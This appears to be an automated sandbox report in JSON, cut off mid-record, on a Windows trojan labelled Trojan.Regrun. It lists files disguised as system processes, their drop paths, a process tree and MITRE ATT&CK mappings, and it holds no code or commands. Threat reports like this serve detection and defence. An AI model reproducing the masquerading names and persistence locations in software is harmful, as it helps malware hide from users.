{"size": 163872, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "av_detect": 93, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 136, "extracted_files": [{"name": "services.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "smss.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "D3_08.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 163872, "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "D3_08.exe", "file_size": 163872, "sha256": "4d90eb2b48b494736be0c68bb2339c23cf71a1c20385595a7b54c83de9eb6655", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_size": 163872, "sha256": "087d8e1076d47d6d214636d5867b3a34d72f2d7f5a2c28b283fdfcc93a213a71", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 163872, "sha256": "6f8693b431d30881686bfdc9b0216e4cc06bc0bf1980e68654d5b0666b5e5f9a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe.bin", "file_size": 163872, "sha256": "4d90eb2b48b494736be0c68bb2339c23cf71a1c20385595a7b54c83de9eb6655", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Empty.pif", "file_size": 163872, "sha256": "44e02d02e4accf2b2a035bb27a6ba32d591a4615287b8a88bceb05bd1c25502b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163872, "sha256": "b3781c35b641b23eb7774d45c8d1513ced607360fc562b4e8bcdccd1f9537727", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 163872, "sha256": "085192dcbf664b48e46418af6c3d21f90e506900c3b5f25709b6edcf7b3d0369", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 163872, "sha256": "e0cf207d49cfa8f7c855603f704cae0b60c34b9cb6363eb7ee617ff4ec9ff181", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE5DF0.bin", "file_size": 163872, "sha256": "d85451757f6a331b0f581b1ab476b4c32644fce734452f97d3d2a28881bc479c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrD3_08.scr", "file_size": 163872, "sha256": "121a5ddae42b65dc9cbe0cfd77a151e57a1f02f5b0348c1093ec20f3a097fcbd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE466A.bin", "file_size": 163872, "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE466E.bin", "file_size": 163872, "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE5DF3.bin", "file_size": 163872, "sha256": "dd887976579c5803cfd2620006d8f491d7edb90e8a4e066fb2d479eb0006d9e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "PuRn4m4.txt", "file_size": 441, "sha256": "c8cfecfb4260f0488e4152cdaaca8854865f0e20d15e9e37cba26f81db38c195", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "desktop.ini", "file_size": 220, "sha256": "a30c401291ad7956c20a1d70c2a58427933f9678864e58a81a5cd6bb0f0bb5cb", "type_tags": ["unknown"], "description": "Windows desktop.ini", "runtime_process": "D3_08.exe (PID: 5160)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 163872, "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 163872, "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 163872, "sha256": "087d8e1076d47d6d214636d5867b3a34d72f2d7f5a2c28b283fdfcc93a213a71", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE5F75.bin", "file_size": 163872, "sha256": "4d90eb2b48b494736be0c68bb2339c23cf71a1c20385595a7b54c83de9eb6655", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 163872, "sha256": "087d8e1076d47d6d214636d5867b3a34d72f2d7f5a2c28b283fdfcc93a213a71", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 163872, "sha256": "b3781c35b641b23eb7774d45c8d1513ced607360fc562b4e8bcdccd1f9537727", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE5F79.bin", "file_size": 163872, "sha256": "6f8693b431d30881686bfdc9b0216e4cc06bc0bf1980e68654d5b0666b5e5f9a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005080", "name": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe", "normalized_path": "C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe", "sha256": "0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0", "av_label": "Trojan.Regrun", "av_matched": 18, "av_total": 22}, {"uid": "00000000-00005160", "parentuid": "00000000-00005080", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00004596", "parentuid": "00000000-00005160", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00005356", "parentuid": "00000000-00005160", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005072", "parentuid": "00000000-00005160", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00005752", "parentuid": "00000000-00005072", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00005544", "parentuid": "00000000-00005072", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005524", "parentuid": "00000000-00005072", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00004192", "parentuid": "00000000-00005072", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00004184", "parentuid": "00000000-00005072", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00003984", "parentuid": "00000000-00005072", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00003224", "parentuid": "00000000-00005072", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00005452", "parentuid": "00000000-00005160", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00003360", "parentuid": "00000000-00005160", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00005532", "parentuid": "00000000-00003360", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00003964", "parentuid": "00000000-00003360", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00006108", "parentuid": "00000000-00003360", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00004156", "parentuid": "00000000-00003360", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00003320", "parentuid": "00000000-00003360", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00003208", "parentuid": "00000000-00003360", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00006116", "parentuid": "00000000-00003360", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00000884", "parentuid": "00000000-00003360", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d85451757f6a331b0f581b1ab476b4c32644fce734452f97d3d2a28881bc479c"}, {"uid": "00000000-00005780", "parentuid": "00000000-00005160", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00005224", "parentuid": "00000000-00005780", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00001288", "parentuid": "00000000-00005780", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00003308", "parentuid": "00000000-00005780", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00001904", "parentuid": "00000000-00005780", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005024", "parentuid": "00000000-00005780", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00003936", "parentuid": "00000000-00005780", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00003972", "parentuid": "00000000-00005780", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00002840", "parentuid": "00000000-00005780", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d85451757f6a331b0f581b1ab476b4c32644fce734452f97d3d2a28881bc479c"}, {"uid": "00000000-00006104", "parentuid": "00000000-00005160", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00004880", "parentuid": "00000000-00005080", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005364", "parentuid": "00000000-00004880", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00005728", "parentuid": "00000000-00004880", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005716", "parentuid": "00000000-00004880", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00005608", "parentuid": "00000000-00004880", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00004320", "parentuid": "00000000-00004880", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00005256", "parentuid": "00000000-00004880", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00004344", "parentuid": "00000000-00004880", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00005152", "parentuid": "00000000-00005080", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00004420", "parentuid": "00000000-00005080", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005644", "parentuid": "00000000-00004420", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00005956", "parentuid": "00000000-00004420", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005312", "parentuid": "00000000-00004420", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00002308", "parentuid": "00000000-00004420", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00004400", "parentuid": "00000000-00004420", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00005472", "parentuid": "00000000-00004420", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00006092", "parentuid": "00000000-00004420", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00005756", "parentuid": "00000000-00005080", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00005560", "parentuid": "00000000-00005080", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00004316", "parentuid": "00000000-00005080", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00001384", "parentuid": "00000000-00004316", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "25764fe65c7ddfd02e5a82b7614b565b2e7af5417b34a428a3c75dd9476ddadd"}, {"uid": "00000000-00005268", "parentuid": "00000000-00004316", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00003604", "parentuid": "00000000-00004316", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00003408", "parentuid": "00000000-00004316", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "6b380f4beb37f751c4c11f6856acc5c5f47db081f0fb0301a3d6016d12401f5c"}, {"uid": "00000000-00005064", "parentuid": "00000000-00004316", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "1eb4eb126707da9c637c6e30f35ba81fbf526243c2719d9f807a01346124454d"}, {"uid": "00000000-00001504", "parentuid": "00000000-00004316", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ac3a83a663698ede6a80fd0299c0c780c707bcf96272c26478d0a41141d7985e"}, {"uid": "00000000-00004200", "parentuid": "00000000-00004316", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ad9891f2f48561c3df89737ebba9233254c90ce052a394f708efdf903940187a"}, {"uid": "00000000-00000556", "parentuid": "00000000-00005080", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d85451757f6a331b0f581b1ab476b4c32644fce734452f97d3d2a28881bc479c"}, {"uid": "00000000-00002568", "parentuid": "00000000-00000556", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d85451757f6a331b0f581b1ab476b4c32644fce734452f97d3d2a28881bc479c"}, {"uid": "00000000-00002832", "parentuid": "00000000-00000556", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "dd887976579c5803cfd2620006d8f491d7edb90e8a4e066fb2d479eb0006d9e1"}, {"uid": "00000000-00003928", "parentuid": "00000000-00000556", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ad435e1935af835f1fafcf79497b005eff132a18ada701a827e49f91b0ecb365"}, {"uid": "00000000-00002548", "parentuid": "00000000-00005080", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "dd887976579c5803cfd2620006d8f491d7edb90e8a4e066fb2d479eb0006d9e1"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": 